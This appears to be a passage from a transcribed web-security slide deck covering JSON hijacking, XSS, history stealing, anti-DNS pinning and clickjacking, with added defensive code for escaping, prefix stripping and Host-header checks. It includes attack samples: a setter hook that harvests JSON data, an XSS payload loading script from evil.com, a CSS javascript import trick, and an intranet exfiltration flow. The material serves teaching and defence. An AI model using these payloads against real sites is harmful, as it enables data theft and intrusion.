var x = {};
x.wibble = "Hello, World";
</script>
21. <script type="text/javascript">
var obj;
function Object() {
  obj = this;
  this.__defineSetter__('killme', function(x) {
    for (var key in obj) {
      if (key != 'killme') {
        alert('Stolen: ' + key + '=' + obj[key]);
      }
    }
  });
  setTimeout("obj['killme']='ignored';", 0);
}
</script>
<script src="http://example.com/data-service/"></script>
22. JavaScript Hijacking
When you serve JavaScript from a website it could be evaluated in a hostile environment
Protect secrets in JavaScript in the same way that you would protect them elsewhere
23. JavaScript Hijacking
Sometimes people wish to have a double layer of security to prevent evaluation:
/*<JSON_HERE>*/ (Don’t do this)
while(true); <JSON_HERE> (Google)
throw new Error(""); <JSON_HERE> (DWR)
{}&& <JSON_HERE>
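The prefix forms listed above with the matching client-side strip, as an added example; this is not DWR's or Google's implementation. It assumes the legitimate client fetches the data over a same-origin XHR and passes the response text to unwrapJson, and the contact list is constructed sample data.

```javascript
// Added example, not DWR's or Google's code: the prefix "double layer" the
// slide lists, with the matching client-side strip. The transport is assumed
// to be an ordinary same-origin XHR whose responseText is passed in.

const PREFIXES = {
  loop: 'while(true);',            // Google: a <script src> include hangs
  throw: 'throw new Error("");',   // DWR: a <script src> include aborts
  and: '{}&&',                     // empty block, then a dangling && operator
};

// Server side: prefix first, JSON after. "</" is also escaped so the body can
// never close a <script> element if it is ever reflected into HTML.
function wrapJson(data, style) {
  const prefix = PREFIXES[style];
  if (prefix === undefined) throw new Error('unknown prefix style: ' + style);
  return prefix + JSON.stringify(data).replace(/<\//g, '<\\/');
}

// Client side: require one of the known prefixes, strip it, and parse with
// JSON.parse rather than eval, so the slide-21 Object() hook never runs.
function unwrapJson(text) {
  for (const prefix of Object.values(PREFIXES)) {
    if (text.startsWith(prefix)) return JSON.parse(text.slice(prefix.length));
  }
  throw new Error('response is missing the anti-hijacking prefix');
}

// True if a body would still parse as bare JSON (a prefixed one must not).
function parsesAsBareJson(text) {
  try { JSON.parse(text); return true; } catch (e) { return false; }
}

// One reason "/* JSON */" is marked "Don't do this": the data sits inside a
// comment, so a user-supplied string containing "*/" ends the comment early
// and the rest of the body becomes live script again. A comment wrapper has
// to reject such data; the prefix forms above do not depend on the data.
function commentWrapIsSafe(data) {
  return JSON.stringify(data).indexOf('*/') === -1;
}

// Constructed sample: the kind of contact list slide 17 refers to.
const SAMPLE = { contacts: [{ name: 'Alice', email: 'alice@example.com' }] };
```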
24. XSS (Cross Site Scripting)
Abusing someone’s trust in your typing
26. XSS
2 types:
• Reflected: Script embedded in the request is ‘reflected’ in the response
• Stored: Attacker’s input is stored and played back in later page views
27. XSS
Scenario: You let the user enter their name
Someone is going to enter their name like this:
Joe<script src="http://evil.com/danger.js">
Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe
Generally HTML is not a valid input, but sometimes it is:
• Blogs, MySpace, Wikis, RSS readers, etc
28. XSS - Making User Input Safe
So, you filter out ‘<script.*>’ and then you’re safe. Right?
30. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to make sense of virtually anything.
This:
<a href="a.html" link</a>
makes perfect sense to a browser.
31. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to make sense of virtually anything.
This:
<a href="a.html">link
makes perfect sense to a browser.
32. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to make sense of virtually anything.
This:
<a href="a.html >link</a>
makes perfect sense to a browser.
33. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to make sense of virtually anything.
This: (depending on some encoding tricks)
¼a href="a.html"¾link¼/a¾
makes perfect sense to a browser.
34. XSS - Making User Input Safe
And we haven’t got into:
• Flash (ActionScript ~= JavaScript)
• SVG (can embed JavaScript)
• XML Data Islands (IE only)
• HTML+TIME
You can use both <object> and <embed> for many of these
35. XSS - The Heart of the Problem
“Be conservative in what you do; be
liberal in what you accept from others”
Postel’s Law
36. XSS - The Heart of the Problem
(Diagram: In + A → Out / B)
37. The web developers get lazy ...
38. The browser fixes the problems ...
39. The users like the new browser ...
41. The browser fixes the problems ...
42. The users like the new browser even more ...
43. XSS - The Heart of the Problem
¼STYLE¾@import'javas
cri
pt:danger()';¼/STYLE¾
44. XSS - Protection (HTML is Illegal)
1. Filter inputs by white-listing input characters
• Remember to filter header names and values
2. Filter outputs for the destination environment
For HTML:
< → &lt;   > → &gt;   ' → &#39;   " → &quot;   & → &amp;
For JavaScript Strings (but see later):
' → \'   " → \"   LF → \n   CR → \r   * → \uXXXX
Other environments have other special chars
45. XSS - Protection (well-formed HTML is legal)
1. Filter inputs as before
2. Validate as HTML and throw away if it fails
3. Swap characters for entities (as before)
4. Swap back whitelist of allowed tags. e.g.:
• &lt;strong&gt; → <strong>
5. Take extra care over attributes:
• &lt;a href=&quot;([^&]*)&quot;/&gt; → <a href="$1"/>
6. Take great care over regular expressions
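The slide 44 output filters for the HTML and JavaScript-string contexts, followed by the slide 45 "escape everything, then swap back an allowlist" step, as an added example that is not code from the deck. The allowlist here is assumed to be <strong>, <em> and <a href> with an http(s) URL; restricting the href to http(s) is an extra check on top of the slide's [^&]* pattern.

```javascript
// Added example, not code from the slides: slide-44 escaping for the HTML
// and JavaScript-string contexts plus the slide-45 allowlist swap-back.
// The allowed tag set (strong, em, a href with http(s)) is an assumption.

// Step 1: character allowlist for the input's destination type.
function filterInput(input, allowed) {
  return allowed.test(input) ? input : null;
}

// HTML context: the five characters from slide 44.
const HTML_ESCAPES = { '<': '&lt;', '>': '&gt;', "'": '&#39;', '"': '&quot;', '&': '&amp;' };
function escapeHtml(s) {
  return String(s).replace(/[<>'"&]/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string context: quotes, LF and CR get backslash escapes, every
// other non-alphanumeric character becomes \uXXXX, so neither a quote nor
// "</script>" in the data can end the string or the script element.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    switch (c) {
      case "'": return "\\'";
      case '"': return '\\"';
      case '\n': return '\\n';
      case '\r': return '\\r';
      default: return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
    }
  });
}

// Slide 45 steps 3-5: entity-encode the whole input, then swap back only the
// allowed tags. The href group cannot contain "&", so no entity (and hence
// no "&quot;" breakout) can ever sit inside the attribute value.
function allowSafeSubset(input) {
  let out = escapeHtml(input);
  out = out.replace(/&lt;(\/?)(strong|em)&gt;/g, '<$1$2>');
  out = out.replace(/&lt;a href=&quot;(https?:\/\/[^&]*)&quot;&gt;/g, '<a href="$1">');
  out = out.replace(/&lt;\/a&gt;/g, '</a>');
  return out;
}

// The slide-27 name, as constructed input.
const JOES_NAME = 'Joe<script src="http://evil.com/danger.js">';
```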
46. XSS - Protection (malformed HTML is legal)
1. Find another way to do it / Swap jobs / Find some other solution to the problem
2. Create a tag soup parser to create a DOM tree from a badly formed HTML document
• Remember to recursively check encodings
3. Create a tree walker that removes all non approved elements and attributes
47. There is NO WAY to protect against some injection points
48. XSS - Injection Points
Places you can protect:
• Plain content
<div>$</div>
• Some attribute values
<input name=x value="$"> (but take care)
• Javascript string values:
<script>str = "$";</script> (but take care)
Anything else is likely to be unsafe
49. XSS - Injection Points
Places you can’t easily protect:
• <script>$</script>
• <div $>
• <div style="$">...
• <div background="$">
• <img src="$">
• etc
If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole
50. XSS Tricks: Comment Power-up
51. XSS - Comment Power-up
Commonly reflected attacks have length restrictions
How to create space for an injection attack
• Use ‘<script>/*’ in a restricted unprotected field and ‘*/’ in a later unrestricted protected field
52. XSS - Summary
For data input:
• Restrict allowed characters for destination type
For data output:
• Escape for the destination environment
• Ensure encoding is specified (e.g. UTF-8)
Allow injection only into known safe points
Never assume that a hole is too small to jump through
54. History Stealing - Part 1
Mr. Evil wants to know if you visit bank.com
He creates a page with a link and uses a script to read the CSS link color:
• purple: customer
• blue: not a customer
55. History Stealing - Part 2
2 methods of detecting link color:
• Easy - use JavaScript to read CSS properties
• When JS is turned off - use CSS to ping the server
56. History Stealing - Part 2
Point a script tag at a protected HTML resource, detect differing replies by differing error messages
<script src="http://mail.google.com/mail">
http://ha.ckers.org/weird/javascript-website-login-checker.html
57. History Stealing - Part 3
A page can quickly check thousands of sites and find where you bank and store your email
A page can follow your clicks around the net:
• Check for common set of URLs
• Page reports hits to server
• Server reads hit pages, greps out links, sends links back
• Page checks and follows a click-stream
59. Web Worms
If your site isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts
XHR/Flash/Quicktime can be used as a vector
Web worms grow much faster than email worms
So far, infections have been mostly benign, like how email worms were in the early 90’s ...
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
60. Intranet Hacking
History stealing to enumerate hosts inside the firewall
Anti-DNS pinning to read HTML from inside
Many routers / firewalls / etc have default passwords, which an attacker can exploit
Use CSRF to alter router / firewall settings
http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf
62. Clickjacking - Protection
if (window.top != window) {
  document.body.style.display = "none";
}
63. ADP = Anti DNS Pinning
Moving intranet servers into your domain
64. Anti-DNS Pinning
(Diagram, slides 64-75: the user’s browser, the DNS server for evil.com, the attacker’s web server at 1.2.3.4 and an intranet web server at 10.0.0.1)
65. Anti-DNS Pinning
Browser: “Let’s visit evil.com”
66. Anti-DNS Pinning
Browser to DNS: “What’s the IP address for evil.com?”
67. Anti-DNS Pinning
DNS to browser: “You need 1.2.3.4” (timeout = 1 sec)
68. Anti-DNS Pinning
Browser to 1.2.3.4: “Can I have http://evil.com?”
69. Anti-DNS Pinning
1.2.3.4 to browser: HTML + JavaScript that creates an iframe 2 seconds after the page has loaded
70. Anti-DNS Pinning
Time passes (2 seconds)
71. Anti-DNS Pinning
Browser to DNS: “What’s the IP address for evil.com?”
72. Anti-DNS Pinning
DNS to browser: “You need 10.0.0.1”
73. Anti-DNS Pinning
Browser to 10.0.0.1: “Can I have http://evil.com/blah?”
74. Anti-DNS Pinning
10.0.0.1: This web server is really http://intranet.corp.com
75. Anti-DNS Pinning
Outer frame reads text from inner iframe and sends it back to 1.2.3.4
76. Anti-DNS Pinning
About ‘Pinning’:
Browsers ‘pin’ addresses to stop short timeouts
DNS round-robin forces re-query of DNS if website appears to be down
So websites can get around pins by firewalling themselves thus appearing to be down
77. Anti-DNS Pinning
It’s not great for the Internet:
The browser thinks the domain is evil.com, so cookies for innocent.com are not sent:
Cookie protected resources are safe (for now)
But it’s great for Intranet hacking
No cookies needed to read from 192.168.0.1 or 127.0.0.1
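A Host-header check an intranet server can apply against the sequence on slides 64-75, as an added example that is not from the deck. When the browser reaches 10.0.0.1 it still believes it is talking to evil.com, so every request carries a Host header of evil.com rather than the server's real name; refusing unexpected Host values stops the page in slide 74 from being returned at all. The allowed names, the 421 status and the request objects are assumptions constructed for the example.

```javascript
// Added example, not code from the slides: Host-header validation for an
// intranet server so a rebound evil.com request is refused. The allowed set
// and the request shape are constructed for the example.

const ALLOWED_HOSTS = new Set(['intranet.corp.com', '10.0.0.1']);

// Accept "name", "name:port", "a.b.c.d[:port]" and "[v6]:port". The port is
// not used for matching but must be a sane number; anything else is rejected
// rather than guessed at.
function parseHostHeader(value) {
  if (typeof value !== 'string' || value.length === 0 || value.length > 255) return null;
  const m = /^(\[[0-9a-fA-F:.]+\]|[A-Za-z0-9.-]+)(?::(\d{1,5}))?$/.exec(value.trim());
  if (!m) return null;
  const port = m[2] === undefined ? null : Number(m[2]);
  if (port !== null && (port < 1 || port > 65535)) return null;
  // Names are case-insensitive and a trailing dot denotes the same name.
  return { host: m[1].toLowerCase().replace(/\.$/, ''), port };
}

function isAllowedHost(headerValue, allowed = ALLOWED_HOSTS) {
  const parsed = parseHostHeader(headerValue);
  return parsed !== null && allowed.has(parsed.host);
}

// Request dispatch: with Host: evil.com the browser is not talking to a name
// this server answers for, so nothing from the intranet page is sent back.
function routeRequest(req) {
  if (!isAllowedHost(req.headers.host)) {
    return { status: 421, body: 'unexpected Host header' };
  }
  return { status: 200, body: 'intranet page' };
}
```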
78. Questions?
Joe Walker
http://sitepen.com
http://directwebremoting.org/blog/joe
80. Web 2.0 Hacking
Building blocks:
• Google Alerts: Search to EMail
• Mailinator: EMail to RSS
• Ponyfish: Web to RSS via scraping
• Storage: DabbleDB, Zoho
• Yahoo Pipes: RSS remixing
• L8R: Cron for EMail
• Google Mashup Editor: RSS to REST API
• Dapper, OpenKappow
82. Dropping SSL after login is dangerous
Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password
Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session:
• https://mail.google.com/mail/
• https://www.google.com/calendar/
• etc.
83. Useful Tools
Firefox:
• NoScript - Accept scripts only from sites you trust
• AltCookies - Accept cookies only from sites you trust
• Edit Cookies - Alter cookies for testing
• Firebug - Dig deeply into HTML/JavaScript/CSS and HTTP
General:
• Paros - Filtering Proxy (can be configured to be transparent)
• Burp - Like Paros
• Fiddler - Like Paros with integration into IE